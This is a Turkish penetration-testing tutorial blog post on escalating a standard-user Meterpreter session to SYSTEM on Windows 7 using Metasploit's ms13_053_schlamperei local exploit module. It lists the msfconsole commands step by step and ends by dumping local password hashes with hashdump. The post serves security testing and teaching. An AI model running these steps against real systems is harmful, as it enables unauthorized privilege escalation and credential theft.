MSF ms13_053_schlamperei İstismar Modülü ile İşletim Sistemindeki Hak Yükseltme Zafiyetinin İstismar Edilerek Meterpreter Bağlantısının Elde Edilmesi

Sızma testleri sırasında standart haklar ile erişim sağlanabilmiş bir bilgisayarda, hak yükseltilerek yönetici hakları elde edilmeye çalışılır. Hak yükseltmek için kullanılan yöntemlerden birisi de işletim sistemindeki zafiyetlerin istismar edilmesidir. Bu yazıda, 32 bit mimarideki Windows 7 işletim sistemine sahip bir bilgisayarda, MS13-053 bültenine ait zafiyet MSF ms13_053_schlamperei istismar modülü ile kötüye kullanılacak ve standart bir kullanıcı hesabı ile elde edilmiş Meterpreter bağlantısında hak yükseltilerek SYSTEM hakları ile Meterpreter bağlantısı elde edilecektir.

Standart yetkilerle elde edilen Meterpreter bağlantısında yerel parola özetlerinin elde edilemediği görülmektedir. Bu yetkilere sahip durumda iken, hak yükseltmek için kullanılacak olan MSF ms13_053_schlamperei istismar modülü seçilir.

getuid
run hashdump
search ntuser
use exploit/windows/local/ms13_053_schlamperei
show options

escalating-privileges-on-windows-by-using-msf-ms13-053-schlamperei-exploit-module-01

Modüle, mevcut oturuma ait ID değeri verilir ve modül başlatılarak SYSTEM hakları elde edilir.

set SESSION 1
show options
run
getuid

escalating-privileges-on-windows-by-using-msf-ms13-053-schlamperei-exploit-module-02

Modülün SYSTEM hakları ile çalışan “notepad.exe” ve sonrasında da “winlogon.exe” adlı iki proses oluşturduğu görülmektedir. Hak yükseltme işlemi sonrasında, yerel hesaplara ait bilgilerin elde edilebildiği görülmektedir.

getuid
getpid
ps -S notepad
run hashdump

escalating-privileges-on-windows-by-using-msf-ms13-053-schlamperei-exploit-module-03

 

Yazarın Bilgileri

Ertuğrul BAŞARANOĞLU
Ertuğrul BAŞARANOĞLU

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

Kullanabileceğiniz HTLM etiketleri ve özellikleri: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code class="" title="" data-url=""> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong> <pre class="" title="" data-url=""> <span class="" title="" data-url="">

Bu sayfada incelenen konulardan doğacak sorunlar kişinin kendi sorumluluğundadır.